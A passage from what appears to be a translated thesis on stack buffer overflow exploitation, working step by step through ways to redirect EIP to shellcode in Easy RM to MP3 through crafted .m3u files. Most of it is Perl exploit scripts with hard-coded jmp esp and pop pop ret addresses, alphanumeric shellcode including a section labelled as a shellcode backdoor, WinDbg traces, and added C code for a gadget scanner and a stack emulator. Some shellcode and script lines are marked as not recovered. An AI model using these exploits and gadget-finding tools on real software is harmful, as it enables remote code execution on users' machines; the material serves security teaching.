my $eip = pack('V', 0x7C836A08);     # call esp in kernel32.dll
my $prependesp = "XXXX";             # 4 bytes between EIP and where ESP points
my $shellcode = "\x90" x 25;         # NOP sled, then the encoded shellcode
$shellcode = $shellcode .            # (the first lines of the shellcode were not recovered)
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
3.3.2. pop return
If no register points directly to the shellcode, but you can see an address on the stack (the first, second, ... DWORD) that points to the shellcode, you can load it into EIP with a pop ret [17] if it is the first one, a pop pop ret if it is the second, or pop pop pop ret and so on, depending on its position on the stack.

In the Easy RM to MP3 example we could make ESP point directly to the shellcode. But what if no register points to the shellcode?
Well, in that case the address pointing to the shellcode may lie on the stack. If you dump ESP, look at the first few addresses. If one of them points to the shellcode (or to a buffer you control), you can find a pop ret or pop pop ret that will:
- take that address from the stack, and
- jump to it, which brings you to the shellcode.

The pop ret technique only works when ESP+offset holds an address pointing to the shellcode. So when you dump ESP, if one of the first few addresses points to the shellcode, put a reference to a pop ret (or pop pop ret) in EIP. This discards some addresses from the stack (one address per pop) and puts the next one into EIP. If that one points to the shellcode, you succeed.

The second case for pop ret: you control EIP, no register points to the shellcode, but your shellcode can be seen at ESP+8. In this case you can put a pop pop ret in EIP: it pops two DWORDs and returns to the address stored at ESP+8, so that slot must itself hold an address that leads to the shellcode (in the test below, the address of a jmp esp).

Let's build a test. We have 26094 bytes before EIP is overwritten, and need 4 more bytes before we reach the location ESP points to (in my case 0x000ff730).
We simulate that at ESP+8 there is an address pointing to the shellcode (in reality we will place the shellcode right after it; this is only a test): 26094 A's, then XXXX (ending where ESP points), a break, then 7 NOPs, a break, and many more NOPs. Assume the shellcode begins at the second break. The goal is to jump from the first break to the second break, at ESP+8 = 0x000ff738.
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";                       # placeholder for the pop pop ret address
my $prependesp = "XXXX";
my $shellcode = "\xcc";                 # first break: where ESP points
$shellcode = $shellcode . "\x90" x 7;
$shellcode = $shellcode . "\xcc";       # second break: ESP+8
$shellcode = $shellcode . "\x90" x 500;
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Looking at the stack, the application crashed through the buffer overflow. EIP was overwritten with BBBB. ESP points to 000ff730, which starts with the first break, then 7 NOPs, then the second break, where the shellcode really starts (at address 0x000ff738).
The goal is to get the value at ESP+8 into EIP and make it jump to the shellcode. We use the pop ret technique together with the address of a jmp esp to accomplish this.
One pop takes 4 bytes off the stack, so ESP points to 000ff734. Another pop takes 4 more bytes, and ESP points to 000ff738. When ret executes, the value at the current ESP is loaded into EIP and ESP moves on to 000ff73c. So if the value at 000ff738 is the address of a jmp esp instruction, that is what EIP executes next, and the jump lands on the buffer after 000ff738, which contains our shellcode.
We need to find pop,pop,ret somewhere and overwrite EIP with the address of the first instruction of that sequence. And we must place at ESP+8 the address of a jmp esp, followed by our shellcode.
First we need the opcodes of pop pop ret. We use the assemble command in WinDbg:
0:000> a
7c90120e pop eax
7c90120f pop ebp
7c901210 ret
7c901211
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e 58              pop     eax
7c90120f 5d              pop     ebp
7c901210 c3              ret
7c901211 ffcc            dec     esp
7c901213 c3              ret
7c901214 8bff            mov     edi,edi
7c901216 8b442404        mov     eax,dword ptr [esp+4]
7c90121a cc              int     3
The buffer layout is:

[26094 A's][EIP = address of POP POP RET][8 bytes offset][address of JMP ESP][shellcode]

The exploit proceeds as follows:
1. EIP is overwritten with the address of POP POP RET; ESP points to the first byte of the 8-byte offset.
2. POP POP RET executes. EIP takes the address 0x01ccf23a (a jmp esp) from ESP+8, and after the ret ESP points to the shellcode.
3. EIP now holds the address of jmp esp; the second jump is made and the shellcode runs.
3.3.3. push return
If no jmp esp or call esp can be found, a "push esp; ret" sequence does the same job: it pushes the value of ESP and then returns into it, so execution continues at ESP. Its opcodes are 54 c3, as WinDbg shows:

0:000> u 000ff7ae
<Unloaded_P32.dll>+0xff79d:
000ff7ae 54              push    esp
000ff7af c3              ret

[the rest of this section was not recovered; its script ends like the previous ones:]
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
3.3.4. jmp [esp + offset]
[...]
- Find the opcode of jmp [esp+8].
- Find an address that points to this instruction.

0:014> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e ff642408        jmp     dword ptr [esp+8]

The opcode is ff642408.
Now you need to search the DLLs for this opcode and use its address to overwrite EIP. But I could not find this opcode anywhere. Of course, the search is not limited to esp+8: the offset can be larger than 8, in which case we add some NOPs to compensate.
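The opcode searches in this chapter (jmp esp in 3.2 and 3.3.1, push esp; ret in 3.3.3, jmp [esp+8] here, pop pop ret in 3.3.2) are the same operation: scan a module's bytes for a short sequence and turn each hit into a virtual address. The following is an added example, not code from the thesis, of a findjmp-style scanner. The module image is a constructed byte array, not a real DLL; only its base address (0x01b10000) is taken from the ModLoad line for MSRMCcodec02.dll above, and the gadget offsets inside it are invented for the example. It also applies the check a practitioner adds before using a hit: whether the address contains a 0x00 byte, which a string copy would truncate.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

typedef struct { const char *name; const unsigned char *bytes; size_t len; } gadget_t;

/* x86 (32-bit) opcode sequences the chapter searches for. */
static const unsigned char JMP_ESP[]      = { 0xff, 0xe4 };              /* jmp esp */
static const unsigned char CALL_ESP[]     = { 0xff, 0xd4 };              /* call esp */
static const unsigned char PUSH_ESP_RET[] = { 0x54, 0xc3 };              /* push esp; ret */
static const unsigned char JMP_ESP_8[]    = { 0xff, 0x64, 0x24, 0x08 };  /* jmp dword ptr [esp+8] */
static const unsigned char POP_POP_RET[]  = { 0x58, 0x5d, 0xc3 };        /* pop eax; pop ebp; ret */

const gadget_t GADGETS[] = {
    { "jmp esp",      JMP_ESP,      sizeof JMP_ESP },
    { "call esp",     CALL_ESP,     sizeof CALL_ESP },
    { "push esp;ret", PUSH_ESP_RET, sizeof PUSH_ESP_RET },
    { "jmp [esp+8]",  JMP_ESP_8,    sizeof JMP_ESP_8 },
    { "pop pop ret",  POP_POP_RET,  sizeof POP_POP_RET },
};
#define N_GADGETS (sizeof GADGETS / sizeof GADGETS[0])

typedef struct { const char *name; uint32_t base; const unsigned char *image; size_t size; } module_t;

/* Constructed stand-in for a loaded DLL: NOP filler with gadgets dropped at
 * chosen offsets. Real code would read the module's bytes from the process. */
#define IMAGE_SIZE 0x2000
static unsigned char image[IMAGE_SIZE];

static void build_fake_module(void)
{
    memset(image, 0x90, sizeof image);
    memcpy(image + 0x0200, CALL_ESP,     sizeof CALL_ESP);      /* VA 0x01b10200: has a 00 byte */
    memcpy(image + 0x0801, PUSH_ESP_RET, sizeof PUSH_ESP_RET);
    memcpy(image + 0x0a11, POP_POP_RET,  sizeof POP_POP_RET);
    memcpy(image + 0x1234, JMP_ESP,      sizeof JMP_ESP);
    memcpy(image + 0x1ff0, JMP_ESP,      sizeof JMP_ESP);       /* a second jmp esp */
}

/* Scan every byte offset: x86 code has no alignment, so a gadget may sit
 * inside the bytes of an unrelated instruction. Returns the number of hits
 * and writes up to max virtual addresses into out. */
size_t find_gadget(const module_t *m, const unsigned char *pat, size_t plen, uint32_t *out, size_t max)
{
    size_t hits = 0;
    for (size_t off = 0; off + plen <= m->size; off++) {
        if (memcmp(m->image + off, pat, plen) != 0) continue;
        if (hits < max) out[hits] = m->base + (uint32_t)off;
        hits++;
    }
    return hits;
}

/* An address with a 0x00 byte cannot be delivered through a string copy. */
int has_null_byte(uint32_t addr)
{
    for (int shift = 0; shift < 32; shift += 8)
        if (((addr >> shift) & 0xff) == 0) return 1;
    return 0;
}

static module_t fake_module(void)
{
    module_t m = { "MSRMCcodec02.dll", 0x01b10000u, image, sizeof image };
    build_fake_module();
    return m;
}

/* Number of occurrences of the named gadget in the fake module. */
size_t gadget_hit_count(const char *name)
{
    module_t m = fake_module();
    for (size_t g = 0; g < N_GADGETS; g++)
        if (strcmp(GADGETS[g].name, name) == 0)
            return find_gadget(&m, GADGETS[g].bytes, GADGETS[g].len, NULL, 0);
    return 0;
}

/* First hit whose address has no null byte, or 0 if none is usable. */
uint32_t first_usable_gadget(const char *name)
{
    module_t m = fake_module();
    for (size_t g = 0; g < N_GADGETS; g++) {
        if (strcmp(GADGETS[g].name, name) != 0) continue;
        uint32_t va[16];
        size_t n = find_gadget(&m, GADGETS[g].bytes, GADGETS[g].len, va, 16);
        for (size_t i = 0; i < n && i < 16; i++)
            if (!has_null_byte(va[i])) return va[i];
    }
    return 0;
}

int main(void)
{
    for (size_t g = 0; g < N_GADGETS; g++)
        printf("%-13s hits=%zu first usable=0x%08x\n", GADGETS[g].name,
               gadget_hit_count(GADGETS[g].name), first_usable_gadget(GADGETS[g].name));
    return 0;
}
```

In the constructed module the call esp is found but unusable (0x01b10200 contains a null byte), and jmp [esp+8] is not found at all, the same outcome the text reports for Easy RM to MP3.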
3.3.5. blind return
In the previous parts, ESP pointed to the current top of the stack. A RET instruction, when executed, pops the last value (4 bytes) from the stack and puts that address into EIP. So if you overwrite EIP with the address of an instruction that executes RET, you bring the address at [ESP] into EIP. If you have a case where the space available in the buffer after the EIP overwrite is limited, but there is plenty of space before it, you can use a jump in the small buffer to jump back to the start of the buffer where the main shellcode is.

The conditions for this technique are:
- You cannot point EIP to a register (because no jump or call instruction can be found).
- You control the value at ESP.
Then, when the RET executes, it takes the 4 bytes at the top of the stack into EIP.
[...]
RET. Remember that in part 1 ESP pointed to 0x000ff730; of course this address changes with each operating system, but there is no way other than hard-coding the address. The buffer looks like this:
[26094 A's][address of ret][0x000ff730][shellcode]
3.3.6. Dealing with small buffers (jumping anywhere with custom jumpcode)
We have talked about how to make EIP jump to our shellcode. Clearly it is convenient to put the shellcode in the buffer after EIP. But what if there is not enough space there for the shellcode?
In the example we used 26094 A's to overwrite EIP, and we saw that ESP points 26094+4 bytes in, with a lot of space before it. But suppose we only had 50 bytes after it: 50 bytes is not enough to store the shellcode. So we must look around and use the 26094 bytes that triggered the overflow.
First, we need to find where these 26094 bytes are in memory. If they cannot be found anywhere, they are very hard to reference; if they are found in memory and some register points to them, it becomes very easy.
Testing Easy RM to MP3, you can see that the 26094 bytes appear in the ESP dump:
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $preshellcode = "X" x 54;       # 4 bytes land before ESP, 50 at ESP
my $nop = "\x90" x 230;
open($FILE, ">$file");
print $FILE $junk.$eip.$preshellcode.$nop;
close($FILE);
print "m3u File Created successfully\n";
Opening test1.m3u, we see 50 X's at ESP. Suppose that is the only space available for the shellcode. However, looking further down, we see that the A's begin at address 000ff849 (= ESP+281).
Looking at the other registers we see no trace of the X's or the A's. So this is it. We could jump to ESP to execute shellcode, but we only have 50 bytes there. We will use another part of our buffer instead: in fact we will jump from the contents of ESP into the large memory region filled with A's.
# (the first six definitions were not recovered here; they are reconstructed from the popad script below)
my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 54;
my $nop2 = "\x90" x 230;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$nop2;
close($FILE);
print "m3u File Created successfully\n";
When the application dies, we can see our 50 NOPs starting at 000ff848, followed by the shellcode (the 0xcc at 000ff874), and then the A's again.
The second thing we need to do is build the jump code. The goal of the jump code is to jump to ESP+281. Jumping to ESP+281 requires: add 281 to ESP, then jmp esp. 281 = 0x119. Don't try to put it all in one instruction, or the opcode will contain null bytes (add esp,0x119 encodes the immediate as 19 01 00 00).
Because there are NOPs in front of the shellcode, the jump does not have to be exact: as long as we add 281 (or a little more) it works. We have 50 bytes for the jump code, so this is not a problem.
Add 0x5e (94) three times, then jmp esp; the assembly is:
0:014> a
7c901211 add esp,0x5e
7c901214 add esp,0x5e
7c901217 add esp,0x5e
7c90121a jmp esp
7c90121c
0:014> u 7c901211
ntdll!DbgBreakPoint+0x3:
7c901211 83c45e          add     esp,5Eh
7c901214 83c45e          add     esp,5Eh
7c901217 83c45e          add     esp,5Eh
7c90121a ffe4            jmp     esp
Test script with a breakpoint as the shellcode (the first four definitions were not recovered and follow the script above):

my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 4;                 # 4 bytes to land exactly on ESP
my $jumpcode = "\x83\xc4\x5e" .             # add esp,0x5e
               "\x83\xc4\x5e" .             # add esp,0x5e
               "\x83\xc4\x5e" .             # add esp,0x5e
               "\xff\xe4";                  # jmp esp
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";

Final script with the real shellcode and the jmp esp address in EIP:

my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "\x90" x 200;
my $nop = "\x90" x 50;
my $shellcode =                              # (the first lines of the shellcode were not recovered)
"\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43" .
"\x51\x42\x4c\x45\x33\x45\x50\x41\x41";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V', 0x01ccf23a);             # jmp esp
my $preshellcode = "X" x 4;
my $jumpcode = "\x83\xc4\x5e" .             # add esp,0x5e
               "\x83\xc4\x5e" .             # add esp,0x5e
               "\x83\xc4\x5e" .             # add esp,0x5e
               "\xff\xe4";                  # jmp esp
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";
3.3.7. popad
popad (pop all double) is another good way of getting to the shellcode. It pops double words from the stack (at ESP) into the general-purpose registers in one instruction. The registers are loaded in the order EDI, ESI, EBP, (the ESP slot is skipped), EBX, EDX, ECX and EAX. As a result ESP increases with each load: one popad takes 32 bytes from ESP and puts them into the registers in that order.
The opcode of popad is 0x61.
Suppose you need to jump 40 bytes but have only a few bytes for the jump instruction; you can use 2 popads to move ESP toward the shellcode (with a few NOP bytes to absorb the 2 x 32 - 40 = 24 bytes of overshoot).
Now we use Easy RM to MP3 to demonstrate this technique. With the same script, we build a buffer that sends 13 X's, followed by some garbage bytes (D's and A's), and then our shellcode (NOPs + A's).
my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 17;       # 4 bytes before ESP, 13 at ESP
my $garbage = "\x44" x 100;        # 100 D's
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
print "m3u File Created successfully\n";
Open the file with Easy RM to MP3; the application crashes.
Suppose we have 13 X's to work with (we will put the popads there) to jump over 100 D's and 160 A's, 260 bytes in total, to reach our shellcode (which starts with NOPs, then a break, then A's). One popad = 32 bytes; 260 bytes = 9 popads (9 x 32 = 288, an overshoot of 28 bytes), so the shellcode must start with NOPs or begin 28 bytes later. In our case we put the NOPs first.
First overwrite EIP with the address of a jmp esp (see the previous parts). Then replace the X's with 9 popads followed by the jmp esp opcode (0xff, 0xe4).
my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V', 0x01ccf23a);                 # jmp esp
my $preshellcode = "X" x 4;                      # 4 bytes before ESP
$preshellcode = $preshellcode . "\x61" x 9;      # 9 x popad: ESP += 288
$preshellcode = $preshellcode . "\xff\xe4";      # jmp esp
$preshellcode = $preshellcode . "\x90\x90\x90";
my $garbage = "\x44" x 100;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
print "m3u File Created successfully\n";
After the application crashes and stops at the breakpoint, ESP and EIP are: eip=000ff874 esp=000ff850. The popads worked and moved ESP to the NOPs in front of the shellcode; then jmp esp (0xff 0xe4) set EIP to those NOPs. Now replace the A's with the real shellcode.
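The redirection gadgets of 3.3.2 (pop pop ret), 3.3.5 (bare ret), 3.3.6 (add esp + jmp esp) and the popad sequence above all work by moving ESP by a known amount and then loading EIP from it. The following is an added example, not code from the thesis: a minimal emulator of those stack-pointer effects over a constructed stack image, using the ESP value (0x000ff730) and the jmp esp address (0x01ccf23a) from the text. It also checks the two sizing rules the text states: how many add esp,0x5e are needed for 281 bytes and why add esp,0x119 is avoided, and how many popads cover 260 bytes and by how much they overshoot. The `cpu_t` model and the scenario functions are assumptions made for the example.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define STACK_BASE   0x000ff730u   /* where ESP pointed after the crash, per the text */
#define JMP_ESP_ADDR 0x01ccf23au   /* the jmp esp address the thesis uses */
#define MEM_SIZE     1024

typedef struct { uint32_t esp, eip; unsigned char mem[MEM_SIZE]; } cpu_t;

static uint32_t rd32(const cpu_t *c, uint32_t addr)
{
    const unsigned char *p = c->mem + (addr - STACK_BASE);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(cpu_t *c, uint32_t addr, uint32_t v)
{
    unsigned char *p = c->mem + (addr - STACK_BASE);
    p[0] = (unsigned char)v; p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}
/* Fresh state: memory full of NOPs (our "shellcode"), ESP at the crash value. */
static void reset(cpu_t *c) { memset(c, 0x90, sizeof *c); c->esp = STACK_BASE; c->eip = 0; }

/* The stack-pointer effects the chapter relies on. */
static void op_pop(cpu_t *c)                   { c->esp += 4; }    /* popped value is discarded */
static void op_ret(cpu_t *c)                   { c->eip = rd32(c, c->esp); c->esp += 4; }
static void op_popad(cpu_t *c)                 { c->esp += 32; }   /* 8 dwords; the ESP slot is skipped */
static void op_add_esp(cpu_t *c, uint32_t imm) { c->esp += imm; }
static void op_jmp_esp(cpu_t *c)               { c->eip = c->esp; }

/* 3.3.2: [8 bytes offset][address of jmp esp][shellcode], EIP = pop pop ret. */
uint32_t scenario_pop_pop_ret(void)
{
    cpu_t c; reset(&c);
    wr32(&c, STACK_BASE + 8, JMP_ESP_ADDR);
    op_pop(&c); op_pop(&c); op_ret(&c);       /* EIP = jmp esp, ESP = base + 12 */
    if (c.eip != JMP_ESP_ADDR) return 0;
    op_jmp_esp(&c);                            /* EIP = first shellcode byte */
    return c.eip;                              /* 0x000ff73c */
}

/* 3.3.5: [address of ret][0x000ff730][shellcode]; a bare ret loads [ESP]. */
uint32_t scenario_blind_ret(void)
{
    cpu_t c; reset(&c);
    wr32(&c, STACK_BASE, STACK_BASE);
    op_ret(&c);
    return c.eip;                              /* 0x000ff730 */
}

/* 3.3.6: reach ESP+281 with add esp,imm8 chunks: ceil(281 / 0x5e) = 3. */
uint32_t add_esp_chunks_needed(uint32_t distance, uint8_t chunk) { return (distance + chunk - 1) / chunk; }
uint32_t scenario_add_esp_jump(void)
{
    cpu_t c; reset(&c);
    for (uint32_t i = 0; i < add_esp_chunks_needed(281, 0x5e); i++) op_add_esp(&c, 0x5e);
    op_jmp_esp(&c);
    return c.eip;                              /* 0x000ff84a: one byte into the NOPs before the shellcode */
}

/* Why three add esp,0x5e and not one add esp,0x119: an imm8 encodes as
 * 83 C4 ib (3 bytes), anything larger as 81 C4 id (6 bytes, here 19 01 00 00). */
size_t encode_add_esp(uint32_t imm, unsigned char out[6])
{
    if (imm <= 0x7f) { out[0] = 0x83; out[1] = 0xc4; out[2] = (unsigned char)imm; return 3; }
    out[0] = 0x81; out[1] = 0xc4;
    out[2] = (unsigned char)imm; out[3] = (unsigned char)(imm >> 8);
    out[4] = (unsigned char)(imm >> 16); out[5] = (unsigned char)(imm >> 24);
    return 6;
}
int add_esp_encoding_has_null(uint32_t imm)
{
    unsigned char b[6]; size_t n = encode_add_esp(imm, b);
    for (size_t i = 0; i < n; i++) if (b[i] == 0) return 1;
    return 0;
}

/* 3.3.7: each popad moves ESP by 32; 260 bytes needs 9 and overshoots by 28. */
uint32_t popad_count(uint32_t distance)     { return (distance + 31) / 32; }
uint32_t popad_overshoot(uint32_t distance) { return popad_count(distance) * 32 - distance; }
uint32_t scenario_popad_jump(void)
{
    cpu_t c; reset(&c);
    for (uint32_t i = 0; i < popad_count(260); i++) op_popad(&c);
    op_jmp_esp(&c);
    return c.eip;                              /* 0x000ff850: the esp the text reports at the breakpoint */
}

int main(void)
{
    printf("pop pop ret -> jmp esp lands at 0x%08x\n", scenario_pop_pop_ret());
    printf("blind ret loads EIP = 0x%08x\n", scenario_blind_ret());
    printf("%u x add esp,0x5e then jmp esp -> 0x%08x (0x119 has null bytes: %d)\n",
           add_esp_chunks_needed(281, 0x5e), scenario_add_esp_jump(), add_esp_encoding_has_null(0x119));
    printf("%u popads (overshoot %u) then jmp esp -> 0x%08x\n",
           popad_count(260), popad_overshoot(260), scenario_popad_jump());
    return 0;
}
```

Note that 9 popads from 0x000ff730 give exactly 0x000ff850, the ESP value the text reports at the breakpoint, and that the 28-byte overshoot is what the NOPs in front of the shellcode absorb.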
3.3.8. Some other techniques
Another way (less preferred, but still possible) is to jump to the shellcode with jump code that uses a hard-coded address (or an offset from a register). Since register contents and addresses differ between programs and runs, this method is not always effective.
So, to hard-code an address or a register offset, you need to find the jump opcode and then use it in the small buffer to jump to your real shellcode.
Below are two examples of finding the opcode:

1. jump to 0x12345678
0:000> a
7c90120e jmp 12345678
7c901213
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e e96544a495      jmp     12345678

2. add an offset to a register, then jump to it
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
7c901214 81c324010000    add     ebx,124h
7c90121a ffe3            jmp     ebx
3.4. SHELLCODE BACKDOOR

# (the start of this script, including the first lines of $shellcode, was not recovered)
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";
open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
From the study of software security vulnerabilities, we see that ensuring software is secure is extremely important. For a software product to be secure, the following are indispensable:
Follow a strict software development process, completely and in the right order. This will avoid
Use secure design patterns. This is the approach that developers always choose. Secure design patterns have been tested and evaluated, and using them avoids the risk of introducing software security bugs.
Employ programmers with experience in the field of software development. They are the people who directly write the software products, so they play an important role in ensuring the product's security.
Perform software testing. This is a mandatory and indispensable stage if the product is to be secure.
Another practice of developers today is hiring skilled hackers to try to attack their product. In this way they can discover bugs they had not anticipated.
4) Studied the ways in which programmers, testers and hackers discover software security bugs.
5) Analysed the stack buffer overflow in detail: how the bug is found and the steps needed to exploit it successfully.
6) Studied the methods hackers use to jump to shellcode.
7) Successfully exploited a stack buffer overflow in an experiment.
The future direction of this thesis is to extend the study of stack buffer overflows to the harder case where no single memory region is large enough to hold the shellcode, so the shellcode must be split into pieces stored across small memory regions; to extend the study of the SEH technique for jumping to shellcode; and to extend the study to other bugs such as heap buffer overflows, double free and use-after-free, together with how to find and exploit them.
APPENDIX 1
1.1. The .text segment
